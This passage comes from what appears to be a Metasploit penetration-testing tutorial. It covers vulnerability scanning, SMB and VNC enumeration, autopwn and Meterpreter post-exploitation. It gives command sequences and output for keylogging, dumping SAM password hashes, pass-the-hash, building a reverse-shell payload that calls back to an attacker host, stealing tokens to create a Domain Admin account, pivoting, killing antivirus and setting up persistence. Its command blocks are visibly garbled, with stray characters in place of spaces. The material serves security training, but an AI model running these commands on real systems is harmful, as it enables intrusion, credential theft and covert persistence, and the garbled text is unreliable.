There is also a scheduling capability, where we can set to scan our network once a week after business hours. With this, we can compare week to week results to detect any anomalies that may have appeared. The Escalator can trigger an event based on the completion of the scan. We can configure it to send an email to administrator when a scan has finished running.

In the Targets option, we can configure the target to be scanned. The Hosts can be a single IP address or a range of IP addresses, whereas a Port Range can be a comma-separated port numbers or ranges. If the Port Range is not specified, then all of the ports found in /usr/local/share/openvas/openvas-services are used there are around 8000 ports. If we wish to use credentials we can also choose them now. After this, we have to create a New Task. This is the point where we put it all together and start scanning.

Lets add a new task, and hit the Play icon. Then we can look at Tasks to see the currently running tasks.

We can also click on the Details icon in the preceding picture, to get all the details of the scan: how complete is the scan, and which vulnerabilities have been found so far.

We can also export results from that view.

3.5 Specialty Vulnerability Scanners

If we would like to scan for a specific vulnerability across a network, we can use metasploitss many auxiliary modules that can help us accomplish this.

3.5.1 SMB Scanning

3.5.1.1 Understanding NetBIOS

SMB (or CIFS) operates as an application-layer network protocol used to provide shared access to files, printers, serial ports, etc. SMB runs on top of the following network layers: directly over TCP: 445 via NetBIOS API, which can run on several ports: on UDP: 137, 138 on TCP: 137, 139 With NetBIOS, machines dont use IP addresses, but use names to differentiate between other machines. Machines on the network are working in WORKGROUPS, where they differentiate between other machines with a name. Therefore each machine in a workgroup must have a different name. There are two approaches to ensure that doesnt happen: Use a NetBIOS Name Server (NBNS) to keep track of which hosts have registered a NetBIOS name. Allow each machine on the network to defend its name in the event that another machine attempts to use it. There must also be a way to resolve a NetBIOS name to a specific IP address. There are two approaches: Have each machine report back its IP address when it hears a broadcast request for its NetBIOS name. Use the NBNS to help resolve NetBIOS names to IP addresses. When a client machine boots, it will broadcast a message declaring that it wishes to register a specified NetBIOS name as its own. If nobody objects to the use of the name after multiple registration attempts, it keeps the name. On the other hand, if another machine on the local subnet is currently using the requested name, it will send a message back to the requesting client that the name is already taken. This is known as defending the hostname. This type of system comes in handy when one client has unexpectedly dropped off the network - another can take its name unchallenged - but it does incur an inordinate amount of traffic on the network for something as simple as name registration. With an NBNS, the same thing occurs, except that the communication is confined to the requesting machine and the NBNS server. No broadcasting occurs when the machine wishes to register the name; the registration message is simply sent directly from the client to NBNS server and the NBNS server replies whether or not the name is already taken. This is known as point-to-point communication, and is often beneficial on networks with more than one subnet. This is because routers are often preconfigured to block incoming packets that are broadcast to all machines in the subnet.

3.5.1.2 Node Types

With NetBIOS there is just a single unique name to represent each computer, and each name is only allowed to have 15 characters. With NetBIOS, a machine not only advertises its presence, but also tells others what types of services it offers. The resource types are shown in angled brackets (<>) after the NetBIOS name, like: 1 2 NAME<00> ***

NetBIOS unique resource types are the following:

Named Resource Standard Workstation Service Messenger Service (WinPopup) RAS Server Service Master Browser name NetDDE Service Fileserver (including printer server) RAS Client Service Network Monitor Agent Network Monitor Utility Hex Byte Value 00 03 06 1D 1F 20 21 BE BF

Domain Master Browser Service (associated with primary domain controller) 1B

NetBIOS group resource types are the following:

Named Resource Logon Server Master Browser name Normal Group name Internet Group name __MSBROWSE__ Hex Byte Value 1C 1D 1E 20 01

Standard Workstation group 00

The __MSBROWSE__ is used to announce a group to other master browsers. To print all the of resources of a given host: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 #*nbtscan*9v*192.168.1.166 NetBIOS*Name*Table*for*Host*192.168.1.166: * Name*************Service**********Type 9999999999999999999999999999999999999999 MYNAME************<00>*************UNIQUE WORKGROUP*********<00>*************GROUP MYNAME************<20>*************UNIQUE WORKGROUP*********<1e>*************GROUP WORKGROUP*********<1d>*************UNIQUE __MSBROWSE__******<01>*************GROUP * Adapter*address:*0091e98c9a995b9ab ***

If some of the entries in the above output have the <20> hex value, then the machine is sharing some resources. To see which resources the machine is sharing, issue:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

#,smbclient,6L,192.168.1.166 Domain=[MYNAME],OS=[Windows,5.1],Server=[Windows,2000,LAN,Manager] , ,,,,,,,,Sharename,,,,,,,Type,,,,,,Comment ,,,,,,,,666666666,,,,,,,6666,,,,,,6666666 ,,,,,,,,IPC$,,,,,,,,,,,,IPC,,,,,,,Remote,IPC ,,,,,,,,D$,,,,,,,,,,,,,,Disk,,,,,,Default,share ,,,,,,,,ADMIN$,,,,,,,,,,Disk,,,,,,Remote,Admin ,,,,,,,,C$,,,,,,,,,,,,,,Disk,,,,,,Default,share , Domain=[MYNAME],OS=[Windows,5.1],Server=[Windows,2000,LAN,Manager] , ,,,,,,,,Server,,,,,,,,,,,,,,,Comment ,,,,,,,,666666666,,,,,,,,,,,,6666666 , ,,,,,,,,Workgroup,,,,,,,,,,,,Master ,,,,,,,,666666666,,,,,,,,,,,,6666666 ,,,

We can now use the following command to reach a directory that has been shared as D on machine 192.168.1.166: 1 2 3 4 #,smbclient,\\\\192.168.1.166\\D$,password Domain=[MYNAME],OS=[Windows,5.1],Server=[Windows,2000,LAN,Manager] tree,connect,failed:,NT_STATUS_ACCESS_DENIED ,,,

Ok, the password isnt correct. We must specify the right password. After we do that, we can see the contents of the drive D on the 192.168.1.166.
3.5.1.3 Metasploit SMB Login Check

The SMB Login Check will connect to a range of hosts and determine if the username/password combination that we posses can access the target. This login check is not very stealth and will show up as a failed login attempt in the event logs of every windows system. Any successful result can be plugged into the windows/smb/psexec exploit module, which can be utilized to create meterpreter sessions. 1 2 3 4 5 6 7 msf,>,use,auxiliary/scanner/smb/smb_login msf,auxiliary(smb_login),>,set,RHOSTS,192.168.50.0/24 msf,auxiliary(smb_login),>,set,SMBUser,Administrator msf,auxiliary(smb_login),>,set,SMBPass,secret msf,auxiliary(smb_login),>,set,THREADS,50 msf,auxiliary(smb_login),>,run ,,,

3.5.2 VNC Authentication

The VNC provides graphical access to remote system. VNC servers are common through corporations, because they provide a GUI-based view of server and workstation desktops. VNC is frequently installed to meet a temporary need and then completely forgotten and left unpatched. The VNC authentication scanner will search a range of IP addresses looking for targets that are running a VNC server without a password configured. To utilize the VNC scanner, we must first select the auxiliary module, define our options, and let it run:

1 2 3 4 5 6

msf*>*use*auxiliary/scanner/vnc/vnc_none_auth msf*auxiliary(vnc_none_auth)*>*set*RHOSTS*10.1.1.0/24 msf*auxiliary(vnc_none_auth)*>*set*THREADS*50 msf*auxiliary(vnc_none_auth)*>*run [*]*Auxiliary*module*execution*completed ***

If metasploit finds a VNC server with no authentication, we can use vncviewer program to connect to the target machine without a password.

3.5.3 Open X11

The Open X11 scanner modules scans a target range for X11 servers that will allow a user to connect without any authentication. 1 2 3 4 5 6 msf*auxiliary(vnc_none_auth)*>*use*auxiliary/scanner/x11/open_x11 msf*auxiliary(open_x11)*>*set*RHOSTS*10.1.1.0/24 msf*auxiliary(open_x11)*>*set*THREADS*50 msf*auxiliary(open_x11)*>*run [*]*Auxiliary*module*execution*completed ***

If we get lucky and find the open X11 vulnerability, we could start a keylogger xspy: 1 2 #*/pentest/sniffers/xspy*Ndisplay*192.168.1.1:0*Ndelay*100 ***

which would remotely sniff the X servers keyboard session.

3.5.4 WMAP Web Scanner

First install the required packages: 1 2 3 4 gem*install*robots gem*install*nokogiri* sudo*gem*install*anemone ***

WMAP is a web vulnerability scanner that is created from SQLMap and allows us to do webapp scanning from within the metasploit. WMAP depends on an active database, which is used to store a list of target URLs and results of the WMAP modules. To get started with WMAP, the database needs to be configured and at least one target must be added. You can bring target data into WMAP through a spider, proxy, or export from another tool - in the example well use the msf http crawler module to add a target. First we have to create a new database to store our scan results in, load the wmap plugin, and execute the available commands. 1 2 3 4 5 6 7 8 9 10 msf*>*db_connect*root:toor@localhost/wmap msf*>*use*auxiliary/scanner/http/crawler msf*auxiliary(crawler)*>*set*RHOST*93.103.50.247 msf*auxiliary(crawler)*>*set*RPORT*80 msf*auxiliary(crawler)*>*run * [*]*Crawling*http://93.103.50.247:80/... [*]*[00001/00500]****200*N*93.103.50.247*N*http://93.103.50.247/ [*]*Crawl*of*http://93.103.50.247:80/*complete [*]*Auxiliary*module*execution*completed

10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77

[*].Auxiliary.module.execution.completed msf.auxiliary(crawler).>.load.wmap [*].[WMAP.1.0].===..et.[..].metasploit.com.2011 [*].Successfully.loaded.plugin:.wmap msf.auxiliary(crawler).>.wmap_sites.Nl Available.sites =============== . .....Id..Host...........Vhost..........Port..#.Pages..#.Forms .....NN..NNNN...........NNNNN..........NNNN..NNNNNNN..NNNNNNN .....0...93.103.50.247..93.103.50.247..80....1........0 . msf.auxiliary(crawler).>.wmap_targets.Nt.93.103.50.247:80 msf.auxiliary(crawler).>.wmap_run.Nh [*].Usage:.wmap_run.[options] ........Nh......................Display.this.help.text ........Nt......................Show.all.enabled.modules ........Nm.[regex]......Launch.only.modules.that.name.match.provided.regex. ........Ne.[/path/to/profile]...........Launch.profile.modules.against.all.matched.targets. ........................................................No.file.runs.all.enabled.modules. . msf.auxiliary(crawler).>.wmap_run.Nt [*].Testing.target: [*].....Site:.93.103.50.247.(93.103.50.247) [*].....Port:.80.SSL:.false ============================================================ [*].Testing.started..Wed.Aug.31.23:52:55.+0200.2011 . =[.SSL.testing.]= ============================================================ [*].Target.is.not.SSL..SSL.modules.disabled. . =[.Web.Server.testing.]= ============================================================ [*].Loaded.auxiliary/scanner/http/robots_txt.... [*].Loaded.auxiliary/scanner/http/http_version.... [*].Loaded.auxiliary/admin/http/tomcat_utf8_traversal.... [*].Loaded.auxiliary/scanner/http/svn_scanner.... [*].Loaded.auxiliary/admin/http/contentkeeper_fileaccess.... [*].Loaded.auxiliary/scanner/http/webdav_scanner.... [*].Loaded.auxiliary/scanner/http/webdav_website_content.... [*].Loaded.auxiliary/scanner/http/webdav_internal_ip.... [*].Loaded.auxiliary/scanner/http/verb_auth_bypass.... [*].Loaded.auxiliary/scanner/http/options.... [*].Loaded.auxiliary/scanner/http/frontpage_login.... [*].Loaded.auxiliary/scanner/http/web_vulndb.... [*].Loaded.auxiliary/scanner/http/open_proxy.... [*].Loaded.auxiliary/scanner/http/vhost_scanner.... [*].Loaded.auxiliary/admin/http/tomcat_administration.... . =[.File/Dir.testing.]= ============================================================ [*].Loaded.auxiliary/scanner/http/dir_scanner.... [*].Loaded.auxiliary/scanner/http/writable.... [*].Loaded.auxiliary/scanner/http/prev_dir_same_name_file.... [*].Loaded.auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.... [*].Loaded.auxiliary/scanner/http/trace_axd.... [*].Loaded.auxiliary/scanner/http/backup_file.... [*].Loaded.auxiliary/scanner/http/brute_dirs.... [*].Loaded.auxiliary/scanner/http/replace_ext.... [*].Loaded.auxiliary/scanner/http/dir_webdav_unicode_bypass.... [*].Loaded.auxiliary/scanner/http/dir_listing.... [*].Loaded.auxiliary/scanner/http/copy_of_file.... [*].Loaded.auxiliary/scanner/http/file_same_name_dir.... [*].Loaded.auxiliary/scanner/http/files_dir.... . =[.Unique.Query.testing.]= ============================================================

77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

============================================================ [*]/Loaded/auxiliary/scanner/http/blind_sql_query/... [*]/Loaded/auxiliary/scanner/http/error_sql_injection/... / =[/Query/testing/]= ============================================================ / =[/General/testing/]= ============================================================ [*]/Analysis/completed/in/10.054025888443/seconds. [*]/Done. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ msf/auxiliary(crawler)/>/hosts/Sc/address,svcs,vulns / Hosts ===== / address////////svcs//vulns SSSSSSS////////SSSS//SSSSS 93.103.50.247//1/////0 msf/auxiliary(crawler)/>/db_notes ///

We can see that the WMAP didnt find any vulnerabilities.

3.5.5 Autopwning
Metasploits autopwn module automatically targets and exploits a system using an open port or using the results of a vulnerability scanner. Autopwn can use the reports of the vulnerability scanners NeXpose, Nessus, OpenVAS. The autopwn command can be as follows: 1 2 msf/>/db_autopwn/Se/St/Sr/Sx/Sp ///

Explanation: -e: launch against all targets -t: show all matching modules -r: use a reverse shell payload -x: select exploit modules based on vulnerability -p: also select exploit modules based on open ports On a success, we will receive a meterpreter sessions that we can list with sessions -l and open with sessions -i <num>.

4 Meterpreter
4.1 Introduction

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the socket and provides a comprehensive clientside Ruby API. It features command history, tab completion, channels, and more. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared objects (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard antivirus detection. We must also point out once again, that we can get a meterpreter shell after weve successfully compromised the system. So the meterpreter shell is just a payload, like reverse_tcp, which allows us to run arbitrary metasploit commands directly on the operating system to obtain the information we want. When exploiting a software vulnerability the most common way of doing it is to get access to /bin/sh or cmd.exe, which allows them to execute commands on the remote machine with the privileges of the user that is running the vulnerable application. Access to the command interpreter gives the attacker nearly full control of the machine bounded only by the privileges of the exploited process. The majority of the published exploits include a payload that executes a command interpreter. The input and output from the command interpreter is typically redirected to a TCP connection that is established by the attacker. There are a few disadvantages of using the native command interpreter: The execution of the command interpreter involves the creation of a new process in the task list, making the attacker visible for the duration of the connection. Most host-based intrusion prevention systems (HIPS) will detect and prevent such actions for both Windows and UNIX. The daemon runs in a chrooted environment, so it is impossible to reference the files and directories that exist above the pseudo-root directory. Since the command interpreter typically exists in a directory that is outside of the scope of the directory that an application would chroot to, the execution of the command interpreter becomes impossible. The command interpreter is limited to the set of commands that is has access to. These three reasons illustrate the down-sides of using a native command interpreter and give us the reasons for implementing the meterpreter, which is capable of avoiding these three issues: The meterpreter is able to avoid the creation of a new process because it executes in the context of the process that is exploited. The meterpreter extensions are all executed entirely from memory, which allows it to avoid issued with chroot, because it does not have to create a new process. The meterpreter allows for incredible control and automation when it comes to writing extensions. Server extensions can be written in any language that can have code distributed as a shared object (DDL) form. This fact makes it no longer necessary to implement specifically purposed position independent code in what typically requires a low-level language such as assembly. How meterpreter works: The target executes the initial stager: bind, reverse, findtag, passivex, etx. The stager loads the DLL prefixed with reflective, which handles the loading/injection of the DLL. The meterpreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client. Meterpreter loads extensions.

4.2 Meterpreter Commands

The meterpreter also provides a default set of commands: help Displays the meterpreter help menu. background This command will send the current meterpreter session to the background and return to the msf prompt. The sessions -l and sessions -i <num> can then be used to return to the meterpreter console. ps This command displays a list of running processes on the target. migrate Using the migrate module, you can migrate to another process on the victim. 1 2 ls This command will list all the files in the current remote directory. download This command downloads a file from the remote machine (use double slashes when giving the windows path) upload This command uploads a file to the remote machine. ipconfig This command displays the network interfaces and addresses on the remote machine. getuid Running getuid will display the user that the meterpreter server is running as on the host. execute The execute command runs a command on the target. shell The shell command will present you with a standard shell on the target system. idletime Running idletime will display the number of seconds that the user at the remote machine has been idle. sysinfo The sysinfo command will tell us the platform on which the system is running. hashdump The hashdump module will dump the contents of the SAM database. 1 2 >$run$post/windows/gather/hashdump$ $$$$$ >$run$post/windows/manage/migrate $$$$$

screenshot The screenshot command will export an image of the active users desktop and save it to the

/opt/metasploit3/msf3/ directory. Meterpreter can be used with nearly all of the windows exploits included in metasploit by selecting one of the following payloads: win32_bind_meterpreter This payload binds to a port on the target machine and waits of a connection. After the connection is established the meterpreter server is uploaded and the existing connection is used for the meterpreter communication channel. win32_reverse_meterpreter This payload connects back to the attacker on a given port. The connection is then used to upload the meterpreter server after which point it is used for the meterpreter communication channel. win32_findrecv_ord_meterpreter This payload searches for the file descriptor that the exploit was triggered from and uses it to upload the meterpreter server after which point the connection is used for the meterpreter communication channel. This payload is particularly interesting because it does not require that a new connection be opened and this bypasses all firewall configurations. Depending on the exploit, any of these payloads can be used. The most preferable payload is entirely dependent on both the exploit and the conditions under which the exploit is being performed, such as firewall restrictions.

4.3 Doing interesting things with meterpreter

All sections here depend on the fact that the victim computer is already compromised and the meterpreter shell is available.

4.3.1 Capturing Keystrokes

With meterpreter we can start keystroke logging on the remote system. First, lets list the running processes on the target system with the ps command: 1 2 meterpreter(>(ps (((

The ps command will display the PID, name of the process, the user that executed the process and the path to the processs binary code. We need to find the process explorer.exe and write down its PID number. Lets say the PID numberof explorer.exe is 666. We issue the migrate command to move our session into the explorer.exe process space. 1 2 meterpreter(>(migrate(666 (((

After that we just need to start the keylog_recorder module to capture the keystrokes of the user:

1 2

meterpreter(>(run(post/windows/capture/keylog_recorder (((

The captured keystrokes are then saved into the txt file under /root/.msf3/loot/ directory.

4.3.2 Dumping Usernames and Passwords

We can use meterpreter to obtain the usernames and password hashes on a local file system. First we need to use the priv command to run commands as a privileged user account. 1 2 meterpreter(>(use(priv (((

To dump the Security Account Manager (SAM) database, we need to be running as SYSTEM to get around the registry restrictions and dump the protected SAM storage that contains usernames and passwords. Well execute the hashdump command, which dumps all the usernames and password hashes from the system. 1 2 meterpreter(>(run(post/windows/gather/hashdump (((

With this command we only receive the hash of the password. But we cant login into additional machines and potentially compromise more systems with one user account. We can use pass-the-hash technique, which requires that we only have the password hash, not the password itself. 1 2 3 4 5 6 7 8 msf(>(use(windows/smb/psexec msf((exploit(psexec)(>(set(PAYLOAD(windows/meterpreter/reverse_tcp msf((exploit(psexec)(>(set(LHOST(192.168.1.2 msf((exploit(psexec)(>(set(LPORT(443 msf((exploit(psexec)(>(set(RHOST(192.168.1.3 msf((exploit(psexec)(>(set(SMBPass(<hash> msf((exploit(psexec)(>(exploit (((

With this module, we can authenticate only with hash, no password is required. This attack allows us to hop from one system to another in the victims network, because its very common that multiple systems will have the same administrator account.

4.3.3 Privilege Escalation

When we have access to the system, we can create a normal user account with limited permissions using the net user command. 1 2 >(net(user(eleanor(pass(/add (((

The normal user account will prevent us from executing commands that require administrative level permissions. By elevating an accounts permissions, we overcome that restriction. To elevate the users permissions, we create a meterpreter-based payload payload.exe, copy it to the targets XP machine, and run it under the user account eleanor. This will be our new limited user account. First lets create a payload.exe that will connect back to the 192.168.1.2:443.

1 2

#$msfpayload4.0$windows/meterpreter/reverse_tcp$LHOST=192.168.1.2$LPORT=443$X$>$payload.exe $$$

Call msfcli interface to start a listener handler, which will wait for connections, and when one is received, it will spawn a meterpreter shell. 1 2 #$msfcli4.0$multi/handler$PAYLOAD=windows/meterpreter/reverse_tcp$LHOST=192.168.1.2$LPORT=443$E $$$

We need to copy payload.exe to the victim machine and execute it under the user eleanor. The payload will then connect back to the attacker machine and spawn a meterpreter shell. In the meterpreter shell we can then execute getuid command to verify that were indeed under eleanor account. 1 2 meterpreter$>$getuid $$$

Next, we can drop into shell and enter command net user eleanor to see the groups the user eleanor belongs to. 1 2 3 4 5 6 7 meterpreter$>$shell C:\>net$user$eleanor Local$Group$Memberships$$$$*Users Global$Group$Memberships$$$*None C:\>^Z Background$channel$1?$[y/N]$y $$$

To get administrative rights, we must use the use priv command to load the priv extensions, which gets us access to the privileged module. Next we enter getsystem in an attempt to elevate our privilege to that of local system, or administrator. We then verify that we have admin privileges with the getuid command. The servers username is NT AUTHORITY\SYSTEM, which tells us that weve succeeded at gaining administrator access. 1 2 3 4 5 meterpreter$>$use$priv meterpreter$>$getsystem meterpreter$>$getuid Server$username:$NT$AUTHORITY\SYSTEM $$$

To switch back to the previous user account where we initially got our meterpreter shell, wed use rev2self.

4.3.4 Token Impersonation

With token impersonation, we grab a kerberos token on the target machine and use it in place of authentication. First we have to list running applications and figure out under which account they are running. In the following example the domain name SNEAKS.IN and the user account adminuser is in use. 1 2 3 4 5 6 meterpreter$>$ps Process$list ============ 380$cmd.exe$$$$$$x86$$$0$$$SNEAKS.IN\adminuser$\System\Root\System32\cmd.exe meterpreter$> $$$

Now we have to use steal_token command to steal the token from a program that has the token.

1 2 3

meterpreter)>)steal_token)380 Stolen)token)with)username:)SNEAKS.IN\adminuser )))

Meterpreter is now running under the context of the adminuser account. Now we can use incognito to list available tokens on the system. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 meterpreter)>)use)incognito Loading)extension)incognito...success. meterpreter)>)list_tokens)Ku [K])Warning:)Not)currently)running)as)SYSTEM,)not)all)tokens)will)be)available Call)rev2self)if)primary)process)token)is)SYSTEM Delegation)Tokens)Available ======================================== SNEAKS.IN\adminuser ADMINUSER\Administrator NT)AUTHORITY\LOCAL)SERVICE NT)AUTHORITY\NETWORK)SERVICE NT)AUTHORITY\SYSTEM Impersonation)Tokens)Available ======================================== NT)AUTHORITY\ANONYMOUS)LOGON )))

We can impersonate the adminuser token and add another user account, which we then give domain administrator privileges. 1 2 3 4 5 6 7 8 9 10 11 12 13 meterpreter)>)impersonate_token)SNEAKS.IN\\adminuser [+])Delegation)token)available [+])Successfully)impersonated)user)SNEAKS.IN\adminuser meterpreter)>)add_user)omgcompromised)p@55w0rd!)Kh)192.168.33.50 [*])Attempting)to)add)user)omgcompromised)to)host)192.168.33.50 [+])Successfully)added)user meterpreter)>)add_group_user)"Domain)Admins")omgcompromised)Kh)192.168.33.50 [*] Attempting)to)add)user)omgcompromised)to)group)Domain)Admins)on)domain)controller 192.168.33.50 [+])Successfully)added)user)to)group ) )))

When entering the add_user and add_group_user commands, be sure to specify the -h flag, which tells Incognito where to add the domain administrator account. In this case, that would be the IP address of a domain controller. The implications for this attack are devastating: Essentially, the Kerberos token on any system that a domain administrator logs into can be assumed and used to access the entire domain. This means that every server on your network is your weakest link!

4.3.5 Pivoting onto Other Systems

Pivoting can be used to attack other systems on a network through the already compromised machine - like tunneling. With pivoting we gain access to systems to which we could not otherwise route traffic, for whatever reason. First, we must assume that weve already compromised a server in a network and we have meterpreter access

to the compromise machine. We begin with displaying local subnets on the compromised system within a meterpreter session with run get_local_subnets command. Next, we background our running session and add a route to the framework, telling it to route the remote network ID over session 1, the background meterpreter session. We then display active routes with route print and we can see that our route is active. 1 2 3 4 5 6 7 8 9 10 11 meterpreter0>0run0get_local_subnets Local0subnet:0192.168.33.0/255.255.255.0 meterpreter0>0background msf0exploit(handler)0>0route0add0192.168.33.00255.255.255.001 msf0exploit(handler)0>0route0print Active0Routing0Table ==================== Subnet0000000000Netmask000000000Gateway RRRRRR0000000000RRRRRRR000000000RRRRRRR 192.168.33.00000255.255.255.0000Session01 000

Next, we must setup a second exploit against another system in a network. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 msf0>0use0linux/samba/lsa_transnames_heap msf0exploit(lsa_transnames_heap)0>0set0payload0linux/x86/shell/reverse_tcp msf0exploit(lsa_transnames_heap)0>0set0LHOST010.10.1.176 msf0exploit(lsa_transnames_heap)0>0set0LPORT08080 msf0exploit(lsa_transnames_heap)0>0set0RHOST0192.168.33.132 msf0exploit(lsa_transnames_heap)0>0ifconfig [*]0exec:0ifconfig 0 lo00000000Link0encap:Local0Loopback 0000000000inet0addr:127.0.0.100Mask:255.0.0.0 0000000000inet60addr:0::1/1280Scope:Host 0000000000UP0LOOPBACK0RUNNING00MTU:1643600Metric:1 0000000000RX0packets:5640errors:00dropped:00overruns:00frame:0 0000000000TX0packets:5640errors:00dropped:00overruns:00carrier:0 0000000000collisions:00txqueuelen:0 0000000000RX0bytes:710940(69.40KiB)00TX0bytes:710940(69.40KiB) 0 wlan000000Link0encap:Ethernet00HWaddr000:26:c6:21:cf:1a 0000000000inet0addr:10.1.1.17600Bcast:10.1.1.25500Mask:255.255.255.0 0000000000inet60addr:0fe80::226:c6ff:fe21:cf1a/640Scope:Link 0000000000UP0BROADCAST0RUNNING0MULTICAST00MTU:150000Metric:1 0000000000RX0packets:34909490errors:00dropped:00overruns:00frame:0 0000000000TX0packets:30257690errors:00dropped:00overruns:00carrier:0 0000000000collisions:00txqueuelen:1000 0000000000RX0bytes:33189980120(3.00GiB)00TX0bytes:8674698700(827.20MiB) 0 0 msf0exploit(lsa_transnames_heap)0>0exploit 000

Our LHOST option specifies the IP address of our attacking machine and RHOST IP address is set to a different network subnet. What were doing is tunneling traffic through the first compromised machine and attacking the second. If the heap overflow is successful, we should be presented with a reverse shell from 192.168.33.132. We can also use load auto_add_route command to automatically add the routes to meterpreter upon a new session spawn. 1 2 3 msf00exploit(lsa_transnames_heap)0>0load0auto_add_route [*]0Successfully0loaded0plugin:0auto_add_route 000

4.3.6 Using Meterpreter Scripts

To run a script from the meterpreter console, issue the run script command.
4.3.6.1 VNC Desktop

If you want to use an interactive remote GUI on the system, you can use the VNC protocol to tunnel the active desktop communications and interact with the GUI desktop. First we have to install the VNC session on the remote target with run vnc and then launch the run screen_unlock command to unload the target machine so that we can view the desktop. As a result, a VNC window should appear, showing us the target desktop. 1 2 3 meterpreter)>)run)vnc meterpreter)>)run)screen_unlock )))

4.3.6.2 Migrating a Process

Often, when attacking a system and exploiting a service such as Internet Explorer, if the target closes the browser, the meterpreter session is also closed and we lose our connection to the target. To avoid this problem, we can use the migrate module to migrate the service to memory space that wont close when the target closes the browser. By migrating to a different, more stable process, we ensure that the process isnt closed and we maintain our connection to the system. 1 2 meterpreter)>)run)post/windows/manage/migrate )))

4.3.6.3 Killing Antivirus Software

Antivirus software can block certain tasks. In such cases we can run the killav command script to stop the processes preventing our tasks from running. 1 2 meterpreter)>)run)killav )))

4.3.6.4 Obtaining System Password Hashes

We can obtain the password hashes by running the run hashdump command. 1 2 meterpreter)>)run)hashdump )))

4.3.6.5 Viewing all Traffic on a Target Machine

To see all traffic on a target, we can run a packet recorder. Everything captured by packetrecorder is saved in the .pcap file format, which can be viewed with wireshark. The -i options specifies the interface we want to use to perform the packet captures. 1 2 meterpreter)>)run)packetrecorder);i)1 )))

4.3.6.6 Scraping the System

The scraper script enumerates just about everything you could ever want from a system. It will grab the usernames and passwords, download the entire registry, dump password hashes, gather system information, and export the HKEY_CURRENT_USER (HKCU). 1 2 meterpreter(>(run(scraper(( (((

4.3.6.7 Using Persistence

The persistence script ensures that meterpreter is running even after the target system reboots. If this is a reverse connection, you can set intervals for the target to connect back to the attacker machine. If you use this functionality, be sure to remove it after youre done. If you forget to do this, any attacker can also gain access to the system without authentication. When we run persistence we have to tell windows to autostart the agent at boot time (-X), wait 50 seconds (-i 50) before connection retries, run on port 443 (-p 443), and connect to IP 192.168.33.129. 1 2 meterpreter(>(run(persistence(0X(0i(50(0p(443(0r(192.168.33.129 (((

Then we need to establish a listener for the agent with use multi/handler. 1 2 3 4 5 6 7 8 9 msf(>(use(multi/handler msf(exploit(handler)(>(set(PAYLOAD(windows/meterpreter/reverse_tcp msf(exploit(handler)(>(set(LPORT(443 msf(exploit(handler)(>(set(LHOST(192.168.33.129 msf(exploit(handler)(>(exploit ( [*](Started(reverse(handler(on(192.168.33.129:443 [*](Starting(the(payload(handler.. (((

After this, the meterperter agent will connect to our machine at 192.168.33.129:443.
4.3.6.8 Interacting with Windows API

We can natively call windows APIs through metasploit add-on called railgun. First we need to use the irb command, which will drop us into an interactive ruby shell. This will in turn allow us to call railgun and thus windows API calls. 1 2 3 4 5 meterpreter(>(irb [*](Starting(IRB(shell [*](The('client'(variable(holds(the(meterpreter(client >>(client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK") (((

On the target machine, we should see a pop-up box with world in the titlebar and hello in the message box. In this example, we simply called the user32.dll and the MessageBoxA function. Remember that railgun gives us the same capabilities as a native Win32 application with full access to the windows API, so we can pretty much do anything we want.

4.4 Meterpreter Scripting

We can add arbitrary scripts to the meterpreter. There are already some scripts written, which can be found in the meterpreter repository http://dev.metasploit.com/redmine/projects/framework/repository/show/scripts/meterpreter. Existing scripts are meant to be used with a meterpreter shell after the successful compromise of a target. Some of the most interesting scripts are: checkvm Check whether the exploited machine is a virtual machine. getcountermeasure Check the security configuration on the victim system and enable/disable security measures such as A/V, Firewall, etc. getgui Enables the RDP on a target system if it is disabled. gettelnet Enable telnet on a target system if it is disabled. killav Disable most antivirus programs running as a service on a target. get_local_subnets Get the local subnet mask from a victim. hostsedit Add entries to the Windows hosts file, which gets checked before the DNS server. This helps us divert traffic to a fake entry. remotewinenum Enumerate system information through wmic in victim. winenum Very detailed windows enumeration tool. scraper Get system information, including the entire registry.

5 Beyond Metasploit
5.1 Armitage
Armitage is a GUI-frontend for the metasploit framework. To install armitage, you have to first download it and run it. Since armitage communicates with metasploit via the RPC daemon, we need to start it: 1 2 #$msfrpcd3.7$/f$/U$msf$/P$msf$/t$Basic $$$

When we start the armitage, the following connection dialog shows up:
Armitage connection dialog.

We need to enable the SSL, and provide the user/pass for the RPC daemon and the mysql database. When we establish a connection, the armitage shows us:
Armitage main window.

To scan a target, we must first select the scanner - weve choosen the smb_version. Then just set the appropriate variables - like RHOSTS.
Armitage selecting a target.

After clicking Launch, the detected hosts are presented on the screen. If there are any hosts that dont wish to be targeted, we can remove them by right-clicking on a host, expanding a "Host" menu, and selecting the

"Remove Host". We need to remember that any data collected with the armitage is also stored in the mysql database.

5.2 Social Engineering Toolkit - SET

The SET is designed to perform advanced attacks against the human element. The attacks build into the toolkit are designed to be targeted against a person or organization used during penetration test. First you need to download the SET: 1 2 #$svn$co$http://svn.secmaniac.com/social_engineering_toolkit$set/ $$$

The SET works out of the box, but provides many configuration options to change its behaviour. The config file is located under config/set_config. You should at least change the METASPLOIT_PATH to define the path to metasploit. SET is menu driven based attack system:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

